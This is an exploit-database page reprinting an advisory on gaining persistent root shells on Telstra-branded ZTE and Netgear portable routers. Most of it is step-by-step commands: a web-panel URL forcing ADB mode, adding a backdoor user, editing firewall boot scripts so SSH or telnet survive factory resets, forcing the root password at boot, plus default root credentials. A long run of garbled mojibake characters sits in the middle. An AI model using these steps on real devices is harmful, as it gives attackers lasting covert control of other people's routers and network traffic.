Exploitalert - Database of Exploits

Telstra 4Gx Portable Router Persistent Root Shell

CVE	Category	Price	Severity
N/A	CWE-119	$5000	Critical

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2017-01-23

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	High	AC	The successful attack depends on the evasion or circumvention of security-enhancing techniques in place that would otherwise hinder the attack. These include: Evasion of exploit mitigation techniques. The attacker must have additional methods available to bypass security measures in place. For example, circumvention of address space randomization (ASLR) or data execution prevention must be performed for the attack to be successful. Obtaining target-specific secrets. The attacker must gather some target-specific secret before the attack can be successful. A secret is any piece of information that cannot be obtained through any amount of reconnaissance. To obtain the secret the attacker must perform additional attacks or break otherwise secure measures (e.g. knowledge of a secret key may be needed to break a crypto channel). This operation must be performed for each attacked target.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2017010183

Telstra 4Gx Portable Router Persistent Root ShellMajority of this info was found from the 4dpa.ru forum but works well on Telstra Mobile routers. Telstra has been contacted and do not see it as a security issue so have fun messing with your 4g routers, not much of a security issue but if you find it useful i had a boring afternoon and took a look. Also just managed to grab my lizardsquad.ru domain back so figured what a fun way to release security vulnerabilities. Please excuse the poor explaination as this is the first time I've wrote one of this. Author of advisory: David Crees ak/a abdilo Email: [email protected] Twitter: @abdilo__ Website link to advisory: https://lizardsquad.ru/index.html Discovery Date: Sep 30th, 2016 All devices have default credentials of: root:oelinux123 if you want to skip adding user and changing root password steps I'm sure if anyone put more then 12 hours of effort into this it would work well. ------------------------------------------------------------ Vulnerable Portable Wi-Fi Router #1: Device: Pre-Paid Telstra 4GX Portable WI-FI Router Model: ZTE MF910V ISP: Telstra Uname -a: Linux mdm9625 3.4.0+ #1 PREEMPT Mon Oct 26 21:47:30 CST 2015 armv7l GNU/Linux Link: http://www.ztemobiles.com.au/MF910B.htm ------------------------------------------------------------ Thanks: http://4pda.ru/ Without 4pda.ru this would of taken days and not a few hours, hats off to you guys even though i can't gain an account(cant type russian captcha) on your site, it was very useful. ------------------------------------------------------------ D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aC/ND2aa!D2aa!D2aa!D2aa!D2aC/a D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/N Step #1 ------------------------------------------------------------ Plug your Telstra 4GX Router into a usb 2.0 slot on your current computer. Open up cmd.exe: cmd.exe > adb start-server cmd.exe > adb devices (Starts ADB) Step #2 ------------------------------------------------------------ Login to http://192.168.0.1/ with default factory new password "password" Once logged on go to: http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=6 (Device is now in ADB mode) Step #3 ------------------------------------------------------------ Go back to cmd.exe and execute these commands: C:> adb devices List of devices attached PXXXXXXXXD000000 device (Your Telstra Hotspot Device Should Apear Here, if it did not then retry beginning steps or wait for drivers to install) C:> adb shell / # (You now have a root adb shell) Step #4 ------------------------------------------------------------ Add new user from adb root shell: mdm9625:~# adduser -s /bin/sh -S newuser mdm9625:~# passwd newuser (enter "newuser") (The user [email protected] has been created) Step #5 ------------------------------------------------------------ Remove old ip tables rulings to get ssh back temporarily: / # iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT / # iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT (SSH is now re-enabled) Step #6 ------------------------------------------------------------ Edit /usr/zte/zte_conf/scripts/firewall_init.sh with vi. Add a "#" infront of lines 92 and 93 as seen below (press the insert key to start typing, once typed CTRL+C, then type :wq, and press enter): #iptables -t filter -I INPUT -p tcp --dport 22 -j DROP #iptables -t filter -I INPUT -p udp --dport 22 -j DROP (This will stop firewall_init.sh from disabling ssh on reboots and factory resets) Step #7 -------------------------------------------------------- Append the following to the bottom of firewall_init.sh using vi(same steps for using vi as above): echo "password password "|passwd (This will change the root user's password at boot to "password", if you do not do this when you reboot the device the root password will change) Step #8 ------------------------------------------------------------ Reboot the device. (This will now disable ADB mode and the device will start normally) Step #9 ------------------------------------------------------------ Connect to the Telstra 4GX Router's wifi signal. Step #10------------------------------------------------------------ Now SSH into the Router: Open PuTTY.exe Enter "192.168.0.1" into "Host Name or IP Address" and click "Open". (A new window will apear follow directions bellow) login as: newuser [email protected]'s password: (enter the password "newuser") mdm9625:~$ whoami newuser mdm9625:~$ su Password: (enter the word "password") mdm9625:/# whoami root mdm9625:/# uname -a Linux mdm9625 3.4.0+ #1 PREEMPT Mon Oct 26 21:47:30 CST 2015 armv7l GNU/Linux mdm9625:/# id uid=0(root) gid=0(root) groups=0(root) mdm9625:/# (Alternatively you can login as the root user directly instead of going through this extra step) Step #11------------------------------------------------------------ Enjoy your persistent root shell. You can even restore device to factory settings via the webpanel or by pressing the button on the device and your shell account still stays persistent with ssh enabled and root's password stuck set as "password". ------------------------------------------------------------ ------------------------------------------------------------ -------------------Bonus Part 2:---------------------------- ------------------------------------------------------------ ------------------------------------------------------------ Device: Pre-Paid Telstra My Pocket Wi-Fi 3G Lite Model: ZTE MF90 ISP: Telstra Link: http://www.ztemobiles.com.au/MF90.htm Step #1 ------------------------------------------------------------ Plug your Telstra 3G Router into a usb 2.0 slot on your current computer. Open up cmd.exe: cmd.exe > adb start-server cmd.exe > adb devices (Starts ADB) Step #2 ------------------------------------------------------------ Login to http://192.168.0.1/ with default factory new password "password" Once logged on go to: http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=6 (Device is now in ADB mode) Step #3 ------------------------------------------------------------ Go back to cmd.exe and execute these commands: C:> adb devices List of devices attached PXXXXXXXXD000000 device (Your Telstra Hotspot Device Should Apear Here, if it did not then retry beginning steps or wait for drivers to install) C:> adb shell / # (You now have a root adb shell) Step #4 ------------------------------------------------------------ Add new user from adb root shell: mdm9625:~# adduser -s /bin/sh -S newuser mdm9625:~# passwd newuser (enter "newuser") (The user [email protected] has been created) Step #5 ------------------------------------------------------------ Edit /usr/zte/zte_conf/scripts/firewall_filter_init.sh with vi. Enter the below text at the bottom of the script: echo "password password "|passwd telnetd -F -p 23 & echo "firewall init done" #nat.sh (This is guarentee admin password is password and enables telnet) ------------------------------------ Open with vi /usr/zte/zte_conf/scripts/firewall_init.sh Enter the below text above the (echo "firewall init done") line. iptables -t filter -I INPUT -p tcp --dport 23 -j ACCEPT iptables -t filter -I INPUT -p udp --dport 23 -j ACCEPT iptables -t filter -I OUTPUT -p udp --dport 23 -j ACCEPT iptables -t filter -I OUTPUT -p tcp --dport 23 -j ACCEPT echo "firewall init done" #nat.sh (This allows telnet through the firewall) ----------------------------------------------------- Reboot it Voila ------------------------------------------------------------ ------------------------------------------------------------ -------------------Bonus Part 3:---------------------------- ------------------------------------------------------------ ------------------------------------------------------------ After realizing how easy it was to root the past two i went out and purchased the brand new Telstra 4GX Advanced III with AirCard Smart Cradle Model DC112A and the Telstra 4GX Advanced II both outright to avoid Telstra claiming i damaged their goods.(Havn't had success with the Telstra 4GX Advanced II yet ak/a NetGear AirCard 790s). Vulnerable Portable Wi-Fi Router: Device: Telstra 4GX Advanced III Model: Netgear AirCard 810S Mobile Hotspot ISP: Telstra Uname -a: Linux mdm9640 3.10.49-svn2309 #1 PREEMPT Thu Sep 3 14:53:22 PDT 2015 armv7l GNU/Linux Link: http://www.netgear.com.au/home/products/mobile-broadband/hotspots/AC810S.aspx?cid=wmt_netgear_organic Step #1 ------------------------------------------------------------ Plug your Telstra 4GX Router into a usb 2.0 slot on your current computer. Open up cmd.exe: cmd.exe > adb start-server cmd.exe > adb connect 192.168.1.1 cmd.exe > adb shell (This will spawn a root shell) --------------------------- Edit /etc/mdev/ntgr-setupinput.sh with vi and enter the bellow text as follows: Add "telnetd-F -p23 &" underneath # NTGRSTART and above MDEV. Save the file ------------------------------ File should look like: #!/bin/sh # NTGRSTART telnetd -F -p 23 & MDEV=`echo $MDEV | sed 's#input/##g'` # Detect touchscreen MSG2133 - driver provides following: # b0018 - bus I2C # v1B20 - MStar Semiconductor USB vendor ID # p2133 - product ID (made up from model name) # Our driver writes these (exccept bus) to input ID strucutre if [ `egrep "input:b0018v1B20p2133*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then ln -sf /dev/input/$MDEV /dev/input/touchscreen0 fi # Detect power key if [ `egrep "input:.*-e0.*,.*k74,.*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then ln -sf /dev/input/$MDEV /dev/input/pwr_key0 fi # Detect touchscreen/button CY8CMBR3108 - driver provides following: # b0018 - bus I2C # v04B4 - Cypress USB vendor ID # p3108 - product ID (made up from model name) # Our driver writes these (exccept bus) to input ID strucutre if [ `egrep "input:b0018v04B4p3108*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then ln -sf /dev/input/$MDEV /dev/input/touchscreen0 fi # NTGRSTOP ------------------------ reboot the device ----------------------- login via telnet with: root:oelinux123 Voila you now have root access ---------------------------------------------------------------------------------------------------------------------- The 16-year-old only has to be right once. You have to be right all the time.

Impressum